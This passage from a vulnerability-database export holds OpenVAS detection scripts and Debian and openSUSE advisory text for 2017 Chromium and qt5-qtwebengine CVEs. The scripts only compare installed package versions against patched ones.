the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873856\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:54:26 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-5124\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\",\n \"CVE-2017-5129\", \"CVE-2017-5132\", \"CVE-2017-5133\", \"CVE-2017-15386\",\n \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15390\", \"CVE-2017-15392\",\n \"CVE-2017-15394\", \"CVE-2017-15396\", \"CVE-2017-15398\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for qt5-qtwebengine FEDORA-2017-15b815b9b7\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'qt5-qtwebengine'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"qt5-qtwebengine on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-15b815b9b7\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTQUMCWRYF6W2XTBHKA7YFUANPLTCWGN\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"qt5-qtwebengine\", rpm:\"qt5-qtwebengine~5.9.3~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-15390", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-15398", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5124"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873859", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873859", "type": "openvas", "title": "Fedora Update for qt5-qtwebengine FEDORA-2017-4d90e9fc97", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_4d90e9fc97_qt5-qtwebengine_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for qt5-qtwebengine FEDORA-2017-4d90e9fc97\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873859\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:55:25 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-5124\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\",\n \"CVE-2017-5129\", \"CVE-2017-5132\", \"CVE-2017-5133\", \"CVE-2017-15386\",\n \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15390\", \"CVE-2017-15392\",\n \"CVE-2017-15394\", \"CVE-2017-15396\", \"CVE-2017-15398\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for qt5-qtwebengine FEDORA-2017-4d90e9fc97\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'qt5-qtwebengine'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"qt5-qtwebengine on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-4d90e9fc97\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GXFTJOIBN72LGHKDWBWDGQS2CEFLOU5C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"qt5-qtwebengine\", rpm:\"qt5-qtwebengine~5.9.3~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5124"], "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\nIn addition, this message serves as an annoucment that security support for\nchromium in the oldstable release (jessie), Debian 8, is now discontinued.\n\nDebian 8 chromium users that desire continued security updates are strongly\nencouraged to upgrade now to the current stable release (stretch), Debian 9.\n\nAn alternative is to switch to the firefox browser, which will continue to\nreceive security updates in jessie for some time.\n\nCVE-2017-5124\nA cross-site scripting issue was discovered in MHTML.\n\nCVE-2017-5125\nA heap overflow issue was discovered in the skia library.\n\nCVE-2017-5126\nLuat Nguyen discovered a use-after-free issue in the pdfium library.\n\nCVE-2017-5127\nLuat Nguyen discovered another use-after-free issue in the pdfium\nlibrary.\n\nCVE-2017-5128\nOmair discovered a heap overflow issue in the WebGL implementation.\n\nCVE-2017-5129\nOmair discovered a use-after-free issue in the WebAudio implementation.\n\nCVE-2017-5131\nAn out-of-bounds write issue was discovered in the skia library.\n\nCVE-2017-5132\nGuarav Dewan discovered an error in the WebAssembly implementation.\n\nCVE-2017-5133\nAleksandar Nikolic discovered an out-of-bounds write issue in the skia\nlibrary.\n\nCVE-2017-15386\nWenXu Wu discovered a user interface spoofing issue.\n\nCVE-2017-15387\nJun Kokatsu discovered a way to bypass the content security policy.\n\nCVE-2017-15388\nKushal Arvind Shah discovered an out-of-bounds read issue in the skia\nlibrary.\n\nCVE-2017-15389\nxisigr discovered a URL spoofing issue.\n\nCVE-2017-15390\nHaosheng Wang discovered a URL spoofing issue.\n\nCVE-2017-15391\nJoao Lucas Melo Brasio discovered a way for an extension to bypass its\nlimitations.\n\nCVE-2017-15392\nXiaoyin Liu discovered an error the implementation of registry keys.\n\nCVE-2017-15393\nSvyat Mitin discovered an issue in the devtools.\n\nCVE-2017-15394\nSam discovered a URL spoofing issue.\n\nCVE-2017-15395\nJohannes Bergman discovered a null pointer dereference issue.\n\nCVE-2017-15396\nYuan Deng discovered a stack overflow issue in the v8 javascript library.", "modified": "2019-03-18T00:00:00", "published": "2017-11-05T00:00:00", "id": "OPENVAS:1361412562310704020", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704020", "type": "openvas", "title": "Debian Security Advisory DSA 4020-1 (chromium-browser - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_4020.nasl 14275 2019-03-18 14:39:45Z cfischer $\n#\n# Auto-generated from advisory DSA 4020-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704020\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2017-15386\", \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15389\", \"CVE-2017-15390\", \"CVE-2017-15391\", \"CVE-2017-15392\", \"CVE-2017-15393\", \"CVE-2017-15394\", \"CVE-2017-15395\", \"CVE-2017-15396\", \"CVE-2017-5124\", \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5131\", \"CVE-2017-5132\", \"CVE-2017-5133\");\n script_name(\"Debian Security Advisory DSA 4020-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-05 00:00:00 +0100 (Sun, 05 Nov 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2017/dsa-4020.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), security support for chromium has\nbeen discontinued.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 62.0.3202.75-1~deb9u1.\n\nFor the testing distribution (buster), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 62.0.3202.75-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the chromium web browser.\n\nIn addition, this message serves as an annoucment that security support for\nchromium in the oldstable release (jessie), Debian 8, is now discontinued.\n\nDebian 8 chromium users that desire continued security updates are strongly\nencouraged to upgrade now to the current stable release (stretch), Debian 9.\n\nAn alternative is to switch to the firefox browser, which will continue to\nreceive security updates in jessie for some time.\n\nCVE-2017-5124\nA cross-site scripting issue was discovered in MHTML.\n\nCVE-2017-5125\nA heap overflow issue was discovered in the skia library.\n\nCVE-2017-5126\nLuat Nguyen discovered a use-after-free issue in the pdfium library.\n\nCVE-2017-5127\nLuat Nguyen discovered another use-after-free issue in the pdfium\nlibrary.\n\nCVE-2017-5128\nOmair discovered a heap overflow issue in the WebGL implementation.\n\nCVE-2017-5129\nOmair discovered a use-after-free issue in the WebAudio implementation.\n\nCVE-2017-5131\nAn out-of-bounds write issue was discovered in the skia library.\n\nCVE-2017-5132\nGuarav Dewan discovered an error in the WebAssembly implementation.\n\nCVE-2017-5133\nAleksandar Nikolic discovered an out-of-bounds write issue in the skia\nlibrary.\n\nCVE-2017-15386\nWenXu Wu discovered a user interface spoofing issue.\n\nCVE-2017-15387\nJun Kokatsu discovered a way to bypass the content security policy.\n\nCVE-2017-15388\nKushal Arvind Shah discovered an out-of-bounds read issue in the skia\nlibrary.\n\nCVE-2017-15389\nxisigr discovered a URL spoofing issue.\n\nCVE-2017-15390\nHaosheng Wang discovered a URL spoofing issue.\n\nCVE-2017-15391\nJoao Lucas Melo Brasio discovered a way for an extension to bypass its\nlimitations.\n\nCVE-2017-15392\nXiaoyin Liu discovered an error the implementation of registry keys.\n\nCVE-2017-15393\nSvyat Mitin discovered an issue in the devtools.\n\nCVE-2017-15394\nSam discovered a URL spoofing issue.\n\nCVE-2017-15395\nJohannes Bergman discovered a null pointer dereference issue.\n\nCVE-2017-15396\nYuan Deng discovered a stack overflow issue in the v8 javascript library.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"62.0.3202.75-1~deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"62.0.3202.75-1~deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-driver\", ver:\"62.0.3202.75-1~deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"62.0.3202.75-1~deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-shell\", ver:\"62.0.3202.75-1~deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-widevine\", ver:\"62.0.3202.75-1~deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:09:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2017-10-19T00:00:00", "id": "OPENVAS:1361412562310811872", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811872", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2017-10)-Windows", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2017-10)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811872\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2017-5124\", \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\",\n \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5132\", \"CVE-2017-5130\",\n \"CVE-2017-5131\", \"CVE-2017-5133\", \"CVE-2017-15386\", \"CVE-2017-15387\",\n \"CVE-2017-15388\", \"CVE-2017-15389\", \"CVE-2017-15390\", \"CVE-2017-15391\",\n \"CVE-2017-15392\", \"CVE-2017-15393\", \"CVE-2017-15394\", \"CVE-2017-15395\");\n script_bugtraq_id(101482);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-19 12:40:22 +0530 (Thu, 19 Oct 2017)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2017-10)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An input validation error in MHTML.\n\n - Multiple heap overflow errors in Skia, WebGL and libxml2.\n\n - Multiple use after free errors in PDFium and WebAudio.\n\n - An incorrect stack manipulation in WebAssembly.\n\n - Multiple Out of bounds read and write errors in Skia.\n\n - UI spoofing in Blink.\n\n - Content security bypass.\n\n - Multiple URL spoofing errors in OmniBox.\n\n - An extension limitation bypass in Extensions.\n\n - An incorrect registry key handling in PlatformIntegration.\n\n - Referrer leak in Devtools.\n\n - URL spoofing in extensions UI.\n\n - Null pointer dereference error in ImageCapture.\n\n - Various fixes from internal audits, fuzzing and other initiatives.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary script,\n conduct spoofing attack, corrupt memory, bypass security and cause\n denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 62.0.3202.62 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 62.0.3202.62 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"62.0.3202.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"62.0.3202.62\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:28:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-10-30T00:00:00", "id": "OPENVAS:1361412562310851634", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851634", "type": "openvas", "title": "openSUSE: Security Advisory for chromium (openSUSE-SU-2017:2902-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851634\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-10-30 09:23:49 +0100 (Mon, 30 Oct 2017)\");\n script_cve_id(\"CVE-2017-15386\", \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15389\",\n \"CVE-2017-15390\", \"CVE-2017-15391\", \"CVE-2017-15392\", \"CVE-2017-15393\",\n \"CVE-2017-15394\", \"CVE-2017-15395\", \"CVE-2017-15396\", \"CVE-2017-5124\",\n \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\",\n \"CVE-2017-5129\", \"CVE-2017-5130\", \"CVE-2017-5131\", \"CVE-2017-5132\",\n \"CVE-2017-5133\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for chromium (openSUSE-SU-2017:2902-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update to Chromium 62.0.3202.75 fixes the following security issues:\n\n - CVE-2017-5124: UXSS with MHTML\n\n - CVE-2017-5125: Heap overflow in Skia\n\n - CVE-2017-5126: Use after free in PDFium\n\n - CVE-2017-5127: Use after free in PDFium\n\n - CVE-2017-5128: Heap overflow in WebGL\n\n - CVE-2017-5129: Use after free in WebAudio\n\n - CVE-2017-5132: Incorrect stack manipulation in WebAssembly.\n\n - CVE-2017-5130: Heap overflow in libxml2\n\n - CVE-2017-5131: Out of bounds write in Skia\n\n - CVE-2017-5133: Out of bounds write in Skia\n\n - CVE-2017-15386: UI spoofing in Blink\n\n - CVE-2017-15387: Content security bypass\n\n - CVE-2017-15388: Out of bounds read in Skia\n\n - CVE-2017-15389: URL spoofing in OmniBox\n\n - CVE-2017-15390: URL spoofing in OmniBox\n\n - CVE-2017-15391: Extension limitation bypass in Extensions.\n\n - CVE-2017-15392: Incorrect registry key handling in PlatformIntegration\n\n - CVE-2017-15393: Referrer leak in Devtools\n\n - CVE-2017-15394: URL spoofing in extensions UI\n\n - CVE-2017-15395: Null pointer dereference in ImageCapture\n\n - CVE-2017-15396: Stack overflow in V8\");\n\n script_tag(name:\"affected\", value:\"chromium on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2902-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~62.0.3202.75~104.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~62.0.3202.75~104.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~62.0.3202.75~104.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~62.0.3202.75~104.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~62.0.3202.75~104.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~62.0.3202.75~118.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~62.0.3202.75~118.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~62.0.3202.75~118.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~62.0.3202.75~118.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~62.0.3202.75~118.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:09:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2017-10-19T00:00:00", "id": "OPENVAS:1361412562310811873", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811873", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2017-10)-Linux", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# 